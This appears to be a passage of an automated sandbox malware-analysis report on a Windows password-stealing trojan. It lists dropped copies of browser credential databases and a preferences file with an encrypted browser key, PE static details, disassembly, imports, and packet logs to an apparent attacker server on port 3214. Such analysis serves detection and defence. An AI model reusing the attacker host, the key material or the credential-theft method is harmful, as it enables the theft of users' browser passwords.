                                                                                                                    SHA-256:8BF06FD5FAE8199D261EB879E771146AE49600DBDED7FDC4EAC83A8C6A7A5D85
                                                                                                                    SHA-512:159A9DE664091A3986042B2BE594E989FD514163094AC606DC3A6A7661A66A78C0D365B8CA2C94B8BC86D552E59D50407B4680EDADB894320125F0E9F48872D3
                                                                                                                    Malicious:false
                                                                                                                    Preview: SQLite format 3......@ ..........................................................................C....... ..g... .8....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                    C:\Users\user\AppData\Local\Temp\tmpFE11.tmp
                                                                                                                    Process:C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PWS.Siggen2.61624.27953.exe
                                                                                                                    File Type:ASCII text, with very long lines, with no line terminators
                                                                                                                    Category:dropped
                                                                                                                    Size (bytes):87165
                                                                                                                    Entropy (8bit):6.102565506017432
                                                                                                                    Encrypted:false
                                                                                                                    SSDEEP:1536:S9sfGRcZdJiXrXafIyYOetKdapZsyTwL3cDGOLN0nTwY/A3iuR+:SsfFcbXafIB0u1GOJmA3iuR+
                                                                                                                    MD5:CC02ABB348037609ED09EC9157D55234
                                                                                                                    SHA1:32411A59960ECF4D7434232194A5B3DB55817647
                                                                                                                    SHA-256:62E0236494260F5C9FFF1C4DBF1A57C66B28A5ABE1ACF21B26D08235C735C7D8
                                                                                                                    SHA-512:AC95705ED369D82B65200354E10875F6AD5EBC4E0F9FFC61AE6C45C32410B6F55D4C47B219BA4722B6E15C34AC57F91270581DB0A391711D70AF376170DE2A35
                                                                                                                    Malicious:false
                                                                                                                    Preview: {"browser":{"last_redirect_origin":"","shortcut_migration_version":"85.0.4183.121"},"data_use_measurement":{"data_used":{"services":{"background":{},"foreground":{}},"user":{"background":{},"foreground":{}}}},"hardware_acceleration_mode_previous":true,"intl":{"app_locale":"en"},"legacy":{"profile":{"name":{"migrated":true}}},"network_time":{"network_time_mapping":{"local":1.601478090199719e+12,"network":1.601453434e+12,"ticks":826153657.0,"uncertainty":4457158.0}},"os_crypt":{"encrypted_key":"RFBBUEkBAAAA0Iyd3wEV0RGMegDAT8KX6wEAAABL95WKt94zTZq03WydzHLcAAAAAAIAAAAAABBmAAAAAQAAIAAAABAL2tyan+lsWtxhoUVdUYrYiwg8iJkppNr2ZbBFie9UAAAAAA6AAAAAAgAAIAAAABDv4gjLq1dOS7lkRG21YVXojnHhsRhNbP8/D1zs78mXMAAAAB045Od5v4BxiFP4bdRYJjDXn4W2fxYqQj2xfYeAnS1vCL4JXAsdfljw4oXIE4R7l0AAAABlt36FqChftM9b7EtaPw98XRX5Y944rq1WsGWcOPFyXOajfBL3GXBUhMXghJbDGb5WCu+JEdxaxLLxaYPp4zeP"},"password_manager":{"os_password_blank":true,"os_password_last_changed":"13245951016607996"},"plugins":{"metadata":{"adobe-flash-player":{"disp
                                                                                                                    C:\Users\user\AppData\Local\Temp\tmpFE51.tmp
                                                                                                                    Process:C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PWS.Siggen2.61624.27953.exe
                                                                                                                    File Type:SQLite 3.x database, last written using SQLite version 3032001
                                                                                                                    Category:dropped
                                                                                                                    Size (bytes):73728
                                                                                                                    Entropy (8bit):1.1874185457069584
                                                                                                                    Encrypted:false
                                                                                                                    SSDEEP:96:I3sa9uKnadsdUDitMkMC1mBKC7g1HFp/GeICEjWTPeKeWbS8pz/YLcs+P+qigSz4:I3rHdMHGTPVbSYgbCP46w/1Vumq
                                                                                                                    MD5:72A43D390E478BA9664F03951692D109
                                                                                                                    SHA1:482FE43725D7A1614F6E24429E455CD0A920DF7C
                                                                                                                    SHA-256:593D9DE27A8CA63553E9460E03FD190DCADD2B96BF63B438B4A92CB05A4D711C
                                                                                                                    SHA-512:FF2777DCDDC72561CF694E2347C5755F19A13D4AC2C1A80C74ADEBB1436C2987DFA0CFBE4BAFD8F853281B24CA03ED708BA3400F2144A5EB3F333CC255DAC7CE
                                                                                                                    Malicious:false
                                                                                                                    Preview: SQLite format 3......@ .......$..................................................................C.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                    C:\Users\user\AppData\Local\Temp\tmpFE52.tmp
                                                                                                                    Process:C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PWS.Siggen2.61624.27953.exe
                                                                                                                    File Type:ASCII text, with very long lines, with no line terminators
                                                                                                                    Category:dropped
                                                                                                                    Size (bytes):87165
                                                                                                                    Entropy (8bit):6.102565506017432
                                                                                                                    Encrypted:false
                                                                                                                    SSDEEP:1536:S9sfGRcZdJiXrXafIyYOetKdapZsyTwL3cDGOLN0nTwY/A3iuR+:SsfFcbXafIB0u1GOJmA3iuR+
                                                                                                                    MD5:CC02ABB348037609ED09EC9157D55234
                                                                                                                    SHA1:32411A59960ECF4D7434232194A5B3DB55817647
                                                                                                                    SHA-256:62E0236494260F5C9FFF1C4DBF1A57C66B28A5ABE1ACF21B26D08235C735C7D8
                                                                                                                    SHA-512:AC95705ED369D82B65200354E10875F6AD5EBC4E0F9FFC61AE6C45C32410B6F55D4C47B219BA4722B6E15C34AC57F91270581DB0A391711D70AF376170DE2A35
                                                                                                                    Malicious:false
                                                                                                                    Preview: {"browser":{"last_redirect_origin":"","shortcut_migration_version":"85.0.4183.121"},"data_use_measurement":{"data_used":{"services":{"background":{},"foreground":{}},"user":{"background":{},"foreground":{}}}},"hardware_acceleration_mode_previous":true,"intl":{"app_locale":"en"},"legacy":{"profile":{"name":{"migrated":true}}},"network_time":{"network_time_mapping":{"local":1.601478090199719e+12,"network":1.601453434e+12,"ticks":826153657.0,"uncertainty":4457158.0}},"os_crypt":{"encrypted_key":"RFBBUEkBAAAA0Iyd3wEV0RGMegDAT8KX6wEAAABL95WKt94zTZq03WydzHLcAAAAAAIAAAAAABBmAAAAAQAAIAAAABAL2tyan+lsWtxhoUVdUYrYiwg8iJkppNr2ZbBFie9UAAAAAA6AAAAAAgAAIAAAABDv4gjLq1dOS7lkRG21YVXojnHhsRhNbP8/D1zs78mXMAAAAB045Od5v4BxiFP4bdRYJjDXn4W2fxYqQj2xfYeAnS1vCL4JXAsdfljw4oXIE4R7l0AAAABlt36FqChftM9b7EtaPw98XRX5Y944rq1WsGWcOPFyXOajfBL3GXBUhMXghJbDGb5WCu+JEdxaxLLxaYPp4zeP"},"password_manager":{"os_password_blank":true,"os_password_last_changed":"13245951016607996"},"plugins":{"metadata":{"adobe-flash-player":{"disp

                                                                                                                    Static File Info

                                                                                                                    General

                                                                                                                    File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                    Entropy (8bit):7.370637877339755
                                                                                                                    TrID:
                                                                                                                    • Win32 Executable (generic) a (10002005/4) 99.96%
                                                                                                                    • Generic Win/DOS Executable (2004/3) 0.02%
                                                                                                                    • DOS Executable Generic (2002/1) 0.02%
                                                                                                                    • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                                                                                    File name:SecuriteInfo.com.Trojan.PWS.Siggen2.61624.27953.exe
                                                                                                                    File size:219136
                                                                                                                    MD5:a6602f490e70a0c9846906944c01b1ba
                                                                                                                    SHA1:3864724e9136d3090cd2e7afa5ae4a348e07e0e4
                                                                                                                    SHA256:1733a30d0e7acb953730092047086555a39f5cb2ee2549021e253cbdc931fb91
                                                                                                                    SHA512:f7648d06aa40af9a09f6c62613289a9c2a633652c8f61412de3f9de096a0bcc7dbc930a8a3a6d7dc64116fbbb24d7552e7ed0ede48fda9ebfb01765b0c19a27d
                                                                                                                    SSDEEP:3072:2DKW1LgppLRHMY0TBfJvjcTp5X1aRIPZJxxJXa6sQ8ksg4oNWfl:2DKW1Lgbdl0TBBvjc/OWA4Vsg4td
                                                                                                                    File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......h..-,q.~,q.~,q.~2#.~?q.~...~+q.~,q.~\q.~2#n~.q.~2#i~.q.~2#{~-q.~Rich,q.~.................d,.....PE..L...t..P..........#........

                                                                                                                    File Icon

                                                                                                                    Icon Hash:00828e8e8686b000

                                                                                                                    Static PE Info

                                                                                                                    General

                                                                                                                    Entrypoint:0x40cd2f
                                                                                                                    Entrypoint Section:.text
                                                                                                                    Digitally signed:false
                                                                                                                    Imagebase:0x400000
                                                                                                                    Subsystem:windows gui
                                                                                                                    Image File Characteristics:32BIT_MACHINE, EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, RELOCS_STRIPPED
                                                                                                                    DLL Characteristics:TERMINAL_SERVER_AWARE
                                                                                                                    Time Stamp:0x5000A574 [Fri Jul 13 22:47:16 2012 UTC]
                                                                                                                    TLS Callbacks:
                                                                                                                    CLR (.Net) Version:
                                                                                                                    OS Version Major:5
                                                                                                                    OS Version Minor:0
                                                                                                                    File Version Major:5
                                                                                                                    File Version Minor:0
                                                                                                                    Subsystem Version Major:5
                                                                                                                    Subsystem Version Minor:0
                                                                                                                    Import Hash:bf5a4aa99e5b160f8521cadd6bfe73b8

                                                                                                                    Entrypoint Preview

                                                                                                                    Instruction
                                                                                                                    call 00007F1D409C4256h
                                                                                                                    jmp 00007F1D409BE419h
                                                                                                                    mov edi, edi
                                                                                                                    push ebp
                                                                                                                    mov ebp, esp
                                                                                                                    sub esp, 20h
                                                                                                                    mov eax, dword ptr [ebp+08h]
                                                                                                                    push esi
                                                                                                                    push edi
                                                                                                                    push 00000008h
                                                                                                                    pop ecx
                                                                                                                    mov esi, 0041F058h
                                                                                                                    lea edi, dword ptr [ebp-20h]
                                                                                                                    rep movsd
                                                                                                                    mov dword ptr [ebp-08h], eax
                                                                                                                    mov eax, dword ptr [ebp+0Ch]
                                                                                                                    pop edi
                                                                                                                    mov dword ptr [ebp-04h], eax
                                                                                                                    pop esi
                                                                                                                    test eax, eax
                                                                                                                    je 00007F1D409BE57Eh
                                                                                                                    test byte ptr [eax], 00000008h
                                                                                                                    je 00007F1D409BE579h
                                                                                                                    mov dword ptr [ebp-0Ch], 01994000h
                                                                                                                    lea eax, dword ptr [ebp-0Ch]
                                                                                                                    push eax
                                                                                                                    push dword ptr [ebp-10h]
                                                                                                                    push dword ptr [ebp-1Ch]
                                                                                                                    push dword ptr [ebp-20h]
                                                                                                                    call dword ptr [0041B000h]
                                                                                                                    leave
                                                                                                                    retn 0008h
                                                                                                                    ret
                                                                                                                    mov eax, 00413563h
                                                                                                                    mov dword ptr [004228E4h], eax
                                                                                                                    mov dword ptr [004228E8h], 00412C4Ah
                                                                                                                    mov dword ptr [004228ECh], 00412BFEh
                                                                                                                    mov dword ptr [004228F0h], 00412C37h
                                                                                                                    mov dword ptr [004228F4h], 00412BA0h
                                                                                                                    mov dword ptr [004228F8h], eax
                                                                                                                    mov dword ptr [004228FCh], 004134DBh
                                                                                                                    mov dword ptr [00422900h], 00412BBCh
                                                                                                                    mov dword ptr [00422904h], 00412B1Eh
                                                                                                                    mov dword ptr [00422908h], 00412AABh
                                                                                                                    ret
                                                                                                                    mov edi, edi
                                                                                                                    push ebp
                                                                                                                    mov ebp, esp
                                                                                                                    call 00007F1D409BE50Bh
                                                                                                                    call 00007F1D409C4D90h
                                                                                                                    cmp dword ptr [ebp+00h], 00000000h

                                                                                                                    Rich Headers

                                                                                                                    Programming Language:
                                                                                                                    • [IMP] VS2005 build 50727
                                                                                                                    • [ C ] VS2008 build 21022
                                                                                                                    • [LNK] VS2008 build 21022
                                                                                                                    • [ASM] VS2008 build 21022
                                                                                                                    • [C++] VS2008 build 21022

                                                                                                                    Data Directories

                                                                                                                    NameVirtual AddressVirtual Size Is in Section
                                                                                                                    IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                                                                                    IMAGE_DIRECTORY_ENTRY_IMPORT0x215b40x50.rdata
                                                                                                                    IMAGE_DIRECTORY_ENTRY_RESOURCE0x260000x13660.rsrc
                                                                                                                    IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                                                                                    IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                                                                                    IMAGE_DIRECTORY_ENTRY_BASERELOC0x00x0
                                                                                                                    IMAGE_DIRECTORY_ENTRY_DEBUG0x1b1c00x1c.rdata
                                                                                                                    IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                                                                    IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                                                                    IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                                                                                    IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x20da00x40.rdata
                                                                                                                    IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                                                                    IMAGE_DIRECTORY_ENTRY_IAT0x1b0000x184.rdata
                                                                                                                    IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                                                                                    IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                                                                                                    IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                                                                                                    Sections

                                                                                                                    NameVirtual AddressVirtual SizeRaw SizeXored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                                                                    .text0x10000x197180x19800False0.578957950368data6.74860454531IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
                                                                                                                    .rdata0x1b0000x6db40x6e00False0.546732954545data6.44295624763IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                                                    .data0x220000x30c00x1600False0.312677556818data3.2625868398IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_READ
                                                                                                                    .rsrc0x260000x136600x13800False0.988744491186data7.9910249633IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ

                                                                                                                    Resources

                                                                                                                    NameRVASizeTypeLanguageCountry
                                                                                                                    RT_RCDATA0x261240x130e4data
                                                                                                                    RT_RCDATA0x392080x20data
                                                                                                                    RT_VERSION0x392280x24cdata
                                                                                                                    RT_MANIFEST0x394740x1eaXML 1.0 document, UTF-8 Unicode (with BOM) text, with CRLF line terminators

                                                                                                                    Imports

                                                                                                                    DLLImport
                                                                                                                    KERNEL32.dllRaiseException, GetLastError, MultiByteToWideChar, lstrlenA, InterlockedDecrement, GetProcAddress, LoadLibraryA, FreeResource, SizeofResource, LockResource, LoadResource, FindResourceA, GetModuleHandleA, Module32Next, CloseHandle, Module32First, CreateToolhelp32Snapshot, GetCurrentProcessId, SetEndOfFile, GetStringTypeW, GetStringTypeA, LCMapStringW, LCMapStringA, GetLocaleInfoA, HeapFree, GetProcessHeap, HeapAlloc, GetCommandLineA, HeapCreate, VirtualFree, DeleteCriticalSection, LeaveCriticalSection, EnterCriticalSection, VirtualAlloc, HeapReAlloc, HeapSize, TerminateProcess, GetCurrentProcess, UnhandledExceptionFilter, SetUnhandledExceptionFilter, IsDebuggerPresent, GetModuleHandleW, Sleep, ExitProcess, WriteFile, GetStdHandle, GetModuleFileNameA, WideCharToMultiByte, GetConsoleCP, GetConsoleMode, ReadFile, TlsGetValue, TlsAlloc, TlsSetValue, TlsFree, InterlockedIncrement, SetLastError, GetCurrentThreadId, FlushFileBuffers, SetFilePointer, SetHandleCount, GetFileType, GetStartupInfoA, RtlUnwind, FreeEnvironmentStringsA, GetEnvironmentStrings, FreeEnvironmentStringsW, GetEnvironmentStringsW, QueryPerformanceCounter, GetTickCount, GetSystemTimeAsFileTime, InitializeCriticalSectionAndSpinCount, GetCPInfo, GetACP, GetOEMCP, IsValidCodePage, CompareStringA, CompareStringW, SetEnvironmentVariableA, WriteConsoleA, GetConsoleOutputCP, WriteConsoleW, SetStdHandle, CreateFileA
                                                                                                                    ole32.dllOleInitialize
                                                                                                                    OLEAUT32.dllSafeArrayCreate, SafeArrayAccessData, SafeArrayUnaccessData, SafeArrayDestroy, SafeArrayCreateVector, VariantClear, VariantInit, SysFreeString, SysAllocString

                                                                                                                    Version Infos

                                                                                                                    DescriptionData
                                                                                                                    Translation0x0000 0x04b0
                                                                                                                    LegalCopyright
                                                                                                                    Assembly Version0.0.0.0
                                                                                                                    InternalNameCloisters.exe
                                                                                                                    FileVersion0.0.0.0
                                                                                                                    ProductVersion0.0.0.0
                                                                                                                    FileDescription
                                                                                                                    OriginalFilenameCloisters.exe

                                                                                                                    Network Behavior

                                                                                                                    Network Port Distribution

                                                                                                                    TCP Packets

                                                                                                                    TimestampSource PortDest PortSource IPDest IP
                                                                                                                    Feb 23, 2021 17:48:08.579906940 CET497183214192.168.2.345.14.13.58
                                                                                                                    Feb 23, 2021 17:48:08.635679007 CET32144971845.14.13.58192.168.2.3
                                                                                                                    Feb 23, 2021 17:48:08.635891914 CET497183214192.168.2.345.14.13.58
                                                                                                                    Feb 23, 2021 17:48:08.775664091 CET497183214192.168.2.345.14.13.58
                                                                                                                    Feb 23, 2021 17:48:08.829349041 CET32144971845.14.13.58192.168.2.3
                                                                                                                    Feb 23, 2021 17:48:08.830141068 CET497183214192.168.2.345.14.13.58
                                                                                                                    Feb 23, 2021 17:48:08.885245085 CET32144971845.14.13.58192.168.2.3
                                                                                                                    Feb 23, 2021 17:48:08.885293007 CET32144971845.14.13.58192.168.2.3
                                                                                                                    Feb 23, 2021 17:48:08.885310888 CET32144971845.14.13.58192.168.2.3
                                                                                                                    Feb 23, 2021 17:48:08.885499001 CET497183214192.168.2.345.14.13.58
                                                                                                                    Feb 23, 2021 17:48:12.442255020 CET4972343192.168.2.3192.0.47.59
                                                                                                                    Feb 23, 2021 17:48:12.566804886 CET4349723192.0.47.59192.168.2.3
                                                                                                                    Feb 23, 2021 17:48:12.566910028 CET4972343192.168.2.3192.0.47.59
                                                                                                                    Feb 23, 2021 17:48:12.568711996 CET4972343192.168.2.3192.0.47.59
                                                                                                                    Feb 23, 2021 17:48:12.693542004 CET4349723192.0.47.59192.168.2.3
                                                                                                                    Feb 23, 2021 17:48:12.696238041 CET4349723192.0.47.59192.168.2.3
                                                                                                                    Feb 23, 2021 17:48:12.696259975 CET4349723192.0.47.59192.168.2.3
                                                                                                                    Feb 23, 2021 17:48:12.696392059 CET4972343192.168.2.3192.0.47.59
                                                                                                                    Feb 23, 2021 17:48:13.539527893 CET4972343192.168.2.3192.0.47.59
                                                                                                                    Feb 23, 2021 17:48:16.511305094 CET497183214192.168.2.345.14.13.58
                                                                                                                    Feb 23, 2021 17:48:16.518768072 CET497263214192.168.2.345.14.13.58
                                                                                                                    Feb 23, 2021 17:48:16.563900948 CET32144971845.14.13.58192.168.2.3
                                                                                                                    Feb 23, 2021 17:48:16.564021111 CET497183214192.168.2.345.14.13.58
                                                                                                                    Feb 23, 2021 17:48:16.571393013 CET32144972645.14.13.58192.168.2.3
                                                                                                                    Feb 23, 2021 17:48:16.571475029 CET497263214192.168.2.345.14.13.58
                                                                                                                    Feb 23, 2021 17:48:16.793100119 CET497263214192.168.2.345.14.13.58
                                                                                                                    Feb 23, 2021 17:48:16.846759081 CET32144972645.14.13.58192.168.2.3
                                                                                                                    Feb 23, 2021 17:48:16.849160910 CET497263214192.168.2.345.14.13.58
                                                                                                                    Feb 23, 2021 17:48:16.901778936 CET32144972645.14.13.58192.168.2.3
                                                                                                                    Feb 23, 2021 17:48:16.901817083 CET32144972645.14.13.58192.168.2.3
                                                                                                                    Feb 23, 2021 17:48:16.901842117 CET32144972645.14.13.58192.168.2.3
                                                                                                                    Feb 23, 2021 17:48:16.901869059 CET32144972645.14.13.58192.168.2.3
                                                                                                                    Feb 23, 2021 17:48:16.901959896 CET497263214192.168.2.345.14.13.58
                                                                                                                    Feb 23, 2021 17:48:16.902014971 CET497263214192.168.2.345.14.13.58
                                                                                                                    Feb 23, 2021 17:48:16.902034044 CET497263214192.168.2.345.14.13.58
                                                                                                                    Feb 23, 2021 17:48:16.954483032 CET32144972645.14.13.58192.168.2.3
                                                                                                                    Feb 23, 2021 17:48:16.954515934 CET32144972645.14.13.58192.168.2.3
                                                                                                                    Feb 23, 2021 17:48:16.954689026 CET32144972645.14.13.58192.168.2.3
                                                                                                                    Feb 23, 2021 17:48:16.954695940 CET497263214192.168.2.345.14.13.58
                                                                                                                    Feb 23, 2021 17:48:16.954773903 CET497263214192.168.2.345.14.13.58
                                                                                                                    Feb 23, 2021 17:48:16.954840899 CET32144972645.14.13.58192.168.2.3
                                                                                                                    Feb 23, 2021 17:48:16.954865932 CET32144972645.14.13.58192.168.2.3
                                                                                                                    Feb 23, 2021 17:48:16.954886913 CET32144972645.14.13.58192.168.2.3
                                                                                                                    Feb 23, 2021 17:48:16.954932928 CET497263214192.168.2.345.14.13.58
                                                                                                                    Feb 23, 2021 17:48:16.954941034 CET32144972645.14.13.58192.168.2.3
                                                                                                                    Feb 23, 2021 17:48:16.954957008 CET497263214192.168.2.345.14.13.58
                                                                                                                    Feb 23, 2021 17:48:16.954992056 CET32144972645.14.13.58192.168.2.3
                                                                                                                    Feb 23, 2021 17:48:16.955008030 CET497263214192.168.2.345.14.13.58
                                                                                                                    Feb 23, 2021 17:48:16.955039978 CET497263214192.168.2.345.14.13.58
                                                                                                                    Feb 23, 2021 17:48:16.955070972 CET32144972645.14.13.58192.168.2.3
                                                                                                                    Feb 23, 2021 17:48:17.011455059 CET32144972645.14.13.58192.168.2.3
                                                                                                                    Feb 23, 2021 17:48:17.011499882 CET32144972645.14.13.58192.168.2.3
                                                                                                                    Feb 23, 2021 17:48:17.011527061 CET32144972645.14.13.58192.168.2.3
                                                                                                                    Feb 23, 2021 17:48:17.011734962 CET497263214192.168.2.345.14.13.58
                                                                                                                    Feb 23, 2021 17:48:17.011862993 CET497263214192.168.2.345.14.13.58
                                                                                                                    Feb 23, 2021 17:48:17.013767004 CET32144972645.14.13.58192.168.2.3
                                                                                                                    Feb 23, 2021 17:48:17.013798952 CET32144972645.14.13.58192.168.2.3
                                                                                                                    Feb 23, 2021 17:48:17.013823032 CET32144972645.14.13.58192.168.2.3
                                                                                                                    Feb 23, 2021 17:48:17.064883947 CET32144972645.14.13.58192.168.2.3
                                                                                                                    Feb 23, 2021 17:48:17.065087080 CET497263214192.168.2.345.14.13.58
                                                                                                                    Feb 23, 2021 17:48:17.065155029 CET32144972645.14.13.58192.168.2.3
                                                                                                                    Feb 23, 2021 17:48:17.065186977 CET32144972645.14.13.58192.168.2.3
                                                                                                                    Feb 23, 2021 17:48:17.065216064 CET32144972645.14.13.58192.168.2.3
                                                                                                                    Feb 23, 2021 17:48:17.065246105 CET32144972645.14.13.58192.168.2.3
                                                                                                                    Feb 23, 2021 17:48:17.065429926 CET497263214192.168.2.345.14.13.58
                                                                                                                    Feb 23, 2021 17:48:17.065464973 CET32144972645.14.13.58192.168.2.3
                                                                                                                    Feb 23, 2021 17:48:17.065495014 CET32144972645.14.13.58192.168.2.3
                                                                                                                    Feb 23, 2021 17:48:17.065520048 CET32144972645.14.13.58192.168.2.3
                                                                                                                    Feb 23, 2021 17:48:17.065526009 CET497263214192.168.2.345.14.13.58
                                                                                                                    Feb 23, 2021 17:48:17.065548897 CET497263214192.168.2.345.14.13.58
                                                                                                                    Feb 23, 2021 17:48:17.065597057 CET497263214192.168.2.345.14.13.58
                                                                                                                    Feb 23, 2021 17:48:17.065620899 CET497263214192.168.2.345.14.13.58
                                                                                                                    Feb 23, 2021 17:48:17.065673113 CET32144972645.14.13.58192.168.2.3
                                                                                                                    Feb 23, 2021 17:48:17.065748930 CET32144972645.14.13.58192.168.2.3
                                                                                                                    Feb 23, 2021 17:48:17.065778971 CET32144972645.14.13.58192.168.2.3
                                                                                                                    Feb 23, 2021 17:48:17.065814018 CET497263214192.168.2.345.14.13.58
                                                                                                                    Feb 23, 2021 17:48:17.065875053 CET497263214192.168.2.345.14.13.58
                                                                                                                    Feb 23, 2021 17:48:17.065890074 CET32144972645.14.13.58192.168.2.3
                                                                                                                    Feb 23, 2021 17:48:17.065908909 CET497263214192.168.2.345.14.13.58
                                                                                                                    Feb 23, 2021 17:48:17.066056013 CET497263214192.168.2.345.14.13.58
                                                                                                                    Feb 23, 2021 17:48:17.066075087 CET32144972645.14.13.58192.168.2.3
                                                                                                                    Feb 23, 2021 17:48:17.066149950 CET497263214192.168.2.345.14.13.58
                                                                                                                    Feb 23, 2021 17:48:17.066236973 CET32144972645.14.13.58192.168.2.3
                                                                                                                    Feb 23, 2021 17:48:17.066348076 CET32144972645.14.13.58192.168.2.3
                                                                                                                    Feb 23, 2021 17:48:17.066373110 CET32144972645.14.13.58192.168.2.3
                                                                                                                    Feb 23, 2021 17:48:17.066397905 CET32144972645.14.13.58192.168.2.3
                                                                                                                    Feb 23, 2021 17:48:17.066425085 CET497263214192.168.2.345.14.13.58
                                                                                                                    Feb 23, 2021 17:48:17.066462040 CET497263214192.168.2.345.14.13.58
                                                                                                                    Feb 23, 2021 17:48:17.066556931 CET497263214192.168.2.345.14.13.58
                                                                                                                    Feb 23, 2021 17:48:17.066559076 CET32144972645.14.13.58192.168.2.3
                                                                                                                    Feb 23, 2021 17:48:17.066627979 CET497263214192.168.2.345.14.13.58
                                                                                                                    Feb 23, 2021 17:48:17.066627979 CET32144972645.14.13.58192.168.2.3
                                                                                                                    Feb 23, 2021 17:48:17.066696882 CET32144972645.14.13.58192.168.2.3
                                                                                                                    Feb 23, 2021 17:48:17.066765070 CET497263214192.168.2.345.14.13.58
                                                                                                                    Feb 23, 2021 17:48:17.066772938 CET32144972645.14.13.58192.168.2.3
                                                                                                                    Feb 23, 2021 17:48:17.066876888 CET497263214192.168.2.345.14.13.58
                                                                                                                    Feb 23, 2021 17:48:17.066885948 CET32144972645.14.13.58192.168.2.3
                                                                                                                    Feb 23, 2021 17:48:17.066979885 CET497263214192.168.2.345.14.13.58
                                                                                                                    Feb 23, 2021 17:48:17.067049026 CET32144972645.14.13.58192.168.2.3
                                                                                                                    Feb 23, 2021 17:48:17.067157984 CET497263214192.168.2.345.14.13.58

                                                                                                                    UDP Packets

                                                                                                                    TimestampSource PortDest PortSource IPDest IP
                                                                                                                    Feb 23, 2021 17:47:41.914413929 CET53512818.8.8.8192.168.2.3
                                                                                                                    Feb 23, 2021 17:47:43.070313931 CET4919953192.168.2.38.8.8.8
                                                                                                                    Feb 23, 2021 17:47:43.130310059 CET53491998.8.8.8192.168.2.3
                                                                                                                    Feb 23, 2021 17:47:43.204674006 CET5062053192.168.2.38.8.8.8
                                                                                                                    Feb 23, 2021 17:47:43.268255949 CET53506208.8.8.8192.168.2.3
                                                                                                                    Feb 23, 2021 17:47:44.293438911 CET6493853192.168.2.38.8.8.8
                                                                                                                    Feb 23, 2021 17:47:44.345494032 CET53649388.8.8.8192.168.2.3
                                                                                                                    Feb 23, 2021 17:47:45.478890896 CET6015253192.168.2.38.8.8.8
                                                                                                                    Feb 23, 2021 17:47:45.530488014 CET53601528.8.8.8192.168.2.3
                                                                                                                    Feb 23, 2021 17:47:46.719755888 CET5754453192.168.2.38.8.8.8
                                                                                                                    Feb 23, 2021 17:47:46.768342018 CET53575448.8.8.8192.168.2.3
                                                                                                                    Feb 23, 2021 17:47:48.040963888 CET5598453192.168.2.38.8.8.8
                                                                                                                    Feb 23, 2021 17:47:48.101161957 CET53559848.8.8.8192.168.2.3
                                                                                                                    Feb 23, 2021 17:47:49.112417936 CET6418553192.168.2.38.8.8.8
                                                                                                                    Feb 23, 2021 17:47:49.161303043 CET53641858.8.8.8192.168.2.3
                                                                                                                    Feb 23, 2021 17:47:50.631541967 CET6511053192.168.2.38.8.8.8
                                                                                                                    Feb 23, 2021 17:47:50.683087111 CET53651108.8.8.8192.168.2.3
                                                                                                                    Feb 23, 2021 17:47:51.948381901 CET5836153192.168.2.38.8.8.8
                                                                                                                    Feb 23, 2021 17:47:51.997004032 CET53583618.8.8.8192.168.2.3
                                                                                                                    Feb 23, 2021 17:47:52.812817097 CET6349253192.168.2.38.8.8.8
                                                                                                                    Feb 23, 2021 17:47:52.862421989 CET53634928.8.8.8192.168.2.3
                                                                                                                    Feb 23, 2021 17:47:54.186367989 CET6083153192.168.2.38.8.8.8
                                                                                                                    Feb 23, 2021 17:47:54.235014915 CET53608318.8.8.8192.168.2.3
                                                                                                                    Feb 23, 2021 17:47:55.011780977 CET6010053192.168.2.38.8.8.8
                                                                                                                    Feb 23, 2021 17:47:55.061762094 CET53601008.8.8.8192.168.2.3
                                                                                                                    Feb 23, 2021 17:47:56.018990993 CET5319553192.168.2.38.8.8.8
                                                                                                                    Feb 23, 2021 17:47:56.071214914 CET53531958.8.8.8192.168.2.3
                                                                                                                    Feb 23, 2021 17:47:56.850816011 CET5014153192.168.2.38.8.8.8
                                                                                                                    Feb 23, 2021 17:47:56.902328968 CET53501418.8.8.8192.168.2.3
                                                                                                                    Feb 23, 2021 17:47:57.942689896 CET5302353192.168.2.38.8.8.8
                                                                                                                    Feb 23, 2021 17:47:57.991410017 CET53530238.8.8.8192.168.2.3
                                                                                                                    Feb 23, 2021 17:48:09.434297085 CET4956353192.168.2.38.8.8.8
                                                                                                                    Feb 23, 2021 17:48:09.485801935 CET53495638.8.8.8192.168.2.3
                                                                                                                    Feb 23, 2021 17:48:10.333668947 CET5135253192.168.2.38.8.8.8
                                                                                                                    Feb 23, 2021 17:48:10.381227016 CET5934953192.168.2.38.8.8.8
                                                                                                                    Feb 23, 2021 17:48:10.385305882 CET53513528.8.8.8192.168.2.3
                                                                                                                    Feb 23, 2021 17:48:10.396611929 CET5708453192.168.2.38.8.8.8
                                                                                                                    Feb 23, 2021 17:48:10.429810047 CET53593498.8.8.8192.168.2.3
                                                                                                                    Feb 23, 2021 17:48:10.457633972 CET53570848.8.8.8192.168.2.3
                                                                                                                    Feb 23, 2021 17:48:11.357084036 CET5882353192.168.2.38.8.8.8
